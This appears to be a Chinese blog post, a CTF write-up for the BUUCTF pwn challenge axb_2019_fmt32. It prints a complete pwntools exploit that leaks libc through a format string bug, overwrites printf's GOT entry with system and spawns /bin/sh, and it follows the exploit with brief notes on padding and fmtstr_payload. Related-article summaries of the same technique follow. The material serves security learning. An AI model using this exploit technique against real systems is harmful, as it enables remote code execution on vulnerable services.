关于”axb_2019_fmt32“的记录

最新推荐文章于 2024-11-14 21:19:37 发布
最新推荐文章于 2024-11-14 21:19:37 发布
阅读量144 收藏
点赞数
分类专栏: 二进制pwn学习 文章标签: linux c语言 stm32
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Probeginner/article/details/121707308
版权

首先看exp:

from os import system
from pwn import*
p=remote('node4.buuoj.cn',29623)
elf=ELF('./fmt32')
libc=ELF('./libc-2.23.so')
printf_got=elf.got['printf']
paylaod1= b'a'+p32(printf_got)+ b'mm'+b'%8$s'
p.sendlineafter("me:",paylaod1)
p.recvuntil("mm")
addr_=u32(p.recv(4))
base = addr_-libc.symbols['printf']
system_=base + libc.symbols['system']

paylaod2=b'a'+fmtstr_payload(8,{printf_got:system_},numbwritten=0xa,write_size='byte')
p.sendline(paylaod2)

p.sendline(";/bin/sh\x00")
p.interactive()

值得注意的有这么几点:
1:paylaod1= b'a'+p32(printf_got)+ b'mm'+b'%8$s'这里第一个“a”是为了使数据上的栈对齐,从而使得后面往格式化字符串后第八个参数能够成功被输出。
2:paylaod2=b'a'+fmtstr_payload(8,{printf_got:system_},numbwritten=0xa,write_size='byte')这个fmtstr_payload的功能简单来说就是使偏移所在处的参数首先作为地址,而后将其指向的地方进行修改"{printf_got:system_}"就是在干这件事情。
具体细节请看这位师傅的

Hvf0x
关注
专栏目录
axb_2019_fmt32 wp
xia0ji233
06-08 481
title: axb_2019_fmt32 wp date: 2021-6-8 22:00:00 tags: write up format string comments: true categories: ctf pwn 临近期末考试了,终于可以光明正大地水博客了。 最近刚写上格式化字符串的漏洞,这不,他来了。这个题目我做过之后感觉难度还是有的,做出这一题至少对格式化字符串漏洞的利用是有一个较深的理解了的。它综合考察了ret2libc和格式化字符串的任意写,以及对got表的理解。 axb_20.
BUUCTF axb_2019_fmt32
BengDouLove的博客
04-16 1580
主程序就是这样的,能看到有一个printf的格式化字符串漏洞 sprintf 相当于把参数替换了之后的格式化字符串送入了第一个参数,也就是format 首先,没有后门也没有系统函数,要用格式化字符串泄露出牟哥libc函数,来获得libc基址 然后,仔细算一下 s 和 format 两个参数,都没有溢出,,也没有函数能写进got表,,所以还是再次利用格式化字符串漏洞通过%n来写入数据 先看...
[BUUCTF]PWN——axb_2019_fmt32
mcmuyanga的博客
11-19 1726
axb_2019_fmt32 附件 步骤: 例行检查,32位程序,开启了nx保护 本地试运行一下程序,看看大概的情况 32位ida载入 alarm(),是闹钟函数,主要功能是设置信号传送闹钟,即用来设置信号SIGALRM在经过参数seconds秒数后发送给目前的进程。如果未设置信号SIGALARM的处理函数,那么alarm()默认处理终止进程 25行,明显的格式化字符串漏洞 这题没有后门函数,也没有系统函数,要用格式化字符串泄露出某个libc函数,来获得libc基址 s 和 format 两个参数
buu axb_2019_fmt32 1
weixin_74861133的博客
03-24 328
程序大概的逻辑是先使用read函数向s读入最多0x100个字节,然后将s拼接在Repeater:后面再加一个\n后将其存入format里,然后输出format,s的大小为0x239,故不能栈溢出。而printf(format)这存在格式化字符串漏洞。而且该程序开启的只是Partial RELRO保护,所以每个libc函数对应的GOT表项是可以被修改的。
axb_2019_fmt32
z1r0的博客
12-20 209
axb_2019_fmt32 查看保护 可以改got的格式化漏洞 测试一下偏移为8,差一个字符,所以payload前面加一个a即可。泄露出libc改printf_got为one_gadget fmtstr_payload中num参数为已经输出的字符个数,这里是0xa; from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r
BUUCTF【axb_2019_fmt32
weixin_51055545的博客
04-25 2208
例行检查 是开 了部分relro,可以改写got表,然后栈不可执行不, IDA分析 很简单的一个程序,会先初始化一些后续要用到的栈空间,然后让我们输入,字节数大小会有限制,然后再对我们的输入做一个长度判断,长度符合的话就会调用printf()函数,存在格式化字符串漏洞,程序里没有system,binsh字符串,我们这里就要先leak出地址,然后返回system即可,观察程序不难发现,我们无法溢出去控制返回地址,然而我们可以去改 某一函数的got表地址为system,从而去get shell,通过分析,s
axb_2019_fmt32(fmtstr_payload(offset, writes, numbwritten=0, write_size=‘byte’))
weixin_61283545的博客
06-15 211
fmtstr_payload(offset, writes, numbwritten=0, write_size=‘byte’) 第一个参数表示格式化字符串的偏移 第二个参数表示需要利用%n写入的数据,采用字典形式,我们要将printf的GOT数据改为system函数地址,就写成{printfGOT:systemAddress}; 第三个参数表示已经输出的字符个数 第四个参数表示写入方式,是按字节(byte)、按双字节(short)还是按四字节(int),对应着hhn、hn和n,默认值是byte,即按hhn
BUUCTF axb_2019_fmt32(格式化字符串漏洞)
weixin_45441024的博客
01-07 1275
BUUCTF axb_2019_fmt32(格式化字符串漏洞) 我们还是先check一下,发现RELRO是关闭的,那么好,可以修改GOT表了 显而易见这是一个格式化字符串漏洞 ,接下来我们来测试一下偏移量 这里可以看到我们输入了5个a它的ASCII码是61,但是往后进行查看只有四个61,所以我们在之后的构造中就再补上一个字符就对齐了,我们算一下它的偏移量是8,所以只要输入%7$p就可以了。我们就可以利用这个和格式化字符串来泄露出一个函数的地址,来获取libc版本,就能获得system函数的地址了。
4.13做题随记(axb_2019_heap, ciscn_2019_final_5)
eeeeeight的博客
04-14 202
4.13做题随记 Column: Apr 14, 2021 Tags: Pwn 相关文件链接 axb_2019_heap ciscn_2019_final_5 axb_2019_heap: 保护检查: 利用思路: banner()中存在明显的格式化字符串漏洞, 因此可以用来泄露栈地址, libc地址以及pie产生的偏移 get_input()中有单字节溢出, 可以修改下一个chunk的inuse位, 从而unlink 因此只要获得偏移后unlink到&note任意读写到malloc_hook, 写
BUUCTF-PWN刷题记录-8
weixin_44145820的博客
04-16 937
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
Linux编辑/etc/fstab文件不当,不使用快照;进入救援模式
feng68_的博客
11-14 398
如果遇到任何问题,您可能需要进一步的故障排除,比如检查文件系统的完整性或修复文件系统错误。1)当出现以下警告时不要慌,如果文件系统默认挂载为只读模式,将其重新挂载为读写模式就好了,应该是吧。您可以选择1继续,或者选择2以只读模式挂载文件系统,或者选择3跳过直接进入shell。后面加), 把只读模式改成读写模式 ,然后ctrl+x重启。然后会出现一串红色的字,太快了,看不清,然后就重启成功了。如果您在虚拟控制台(VC)1或VC2中,可以使用。获取root权限,这样您就可以编辑。2)挂载根文件系统为读写模式。
Linux:网络协议socket
Au_ust的博客
11-05 1502
我们之前学的通信是本地进程间通信,如果我们想在网络间通信的话,就需要用到二者的ip地址,分别被称为源IP地址和目的IP地址,被存入ip数据包中,其次我们还需要遵循一些通信协议。TCP协议:传输层协议,有连接,可靠传输,面向字节流(无明确边界的字节序列),难UDP协议:传输层协议,无连接,不可靠传输,面向数据流(以数据包为单位),简单网络通信的本质也是进程间通信,你怎么知道你要和哪个进程通信?
Linux】多线程(中)
Eristic0618的博客
11-14 793
本篇文章围绕Linux中的多线程展开讲解,包含线程互斥的概念、互斥量mutex和相关API、互斥量原理、重入和线程安全、死锁、线程同步和条件变量等内容
SimpleScreenRecorder, a screen recording tool for Linux
likecayon的博客
11-11 356
【代码】SimpleScreenRecorder, a screen recording tool for Linux
20241114在飞凌的OK3588-C的核心板上跑Linux R4时通过iperf3测试以太网卡的实际网速
最新发布
南岭笑笑生之家
11-14 667
创建一个eth0配置文件, 配置文件的路径为:/etc/network/interfaces.d/eth0,设置动态ip的配置文件。虽然 飞凌的OK3588-C的核心板 使用的是千兆网卡RTL8211F-CG,但是只接了4根线,作为百兆网卡使用了。OK3588-C板载两个千兆网卡,插入网线连接网络的情况下,出厂时默认配置为动态IP。跑iperf3的时候,以 飞凌的OK3588-C的核心板Linux R4 为服务器,设置完后使用sync文件同步指令,重启开发板或者重启服务,配置生效。双方通过交换机连接。
gdb编译教程(支持linux下X86和ARM架构)
weixin_43246170的博客
11-12 229
5、我们先开始x86版本,这个比较简单,不需要配置交叉编译工具(当然前提是系统装了gcc和g++的环境啊)。将gdb文件拷贝到对应平台下,即可使用。(或者使用gdbserver远程调试)以上这些配置都是要跟在./configure后面的。3、解压,然后进入到目录下,打开当前目录的命令行窗口。2、下载完后拷贝到linux的x86系统。先清理下编译x86残留下的临时文件。6、限制我们来编译ARM版本。4、创建一个生成目录。我下载的8.2版本。
Linux ssh 基础教程
tangPHP的博客
11-13 760
SSH是一种安全协议,用作远程连接Linux服务器的主要手段。它通过生成远程shell提供基于文本的界面。连接之后,在本地终端中键入的所有命令都将发送到远程服务器并在那里执行,一般说ssh即openssh。OpenSSH(Open Secure Shell),是一套安全的网络工具,它在不安全的网络上提供加密通信。它主要用于安全远程登录、文件传输和其他安全网络服务。
linux 下查看程序启动的目录
qq_39763510的博客
11-11 192
第一步、ps -ef | grep azkaban 查询出进程号。第二步、cd /proc/第三步 、cd 进程号。第四部 ll 查看详情。以azkaban为例。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值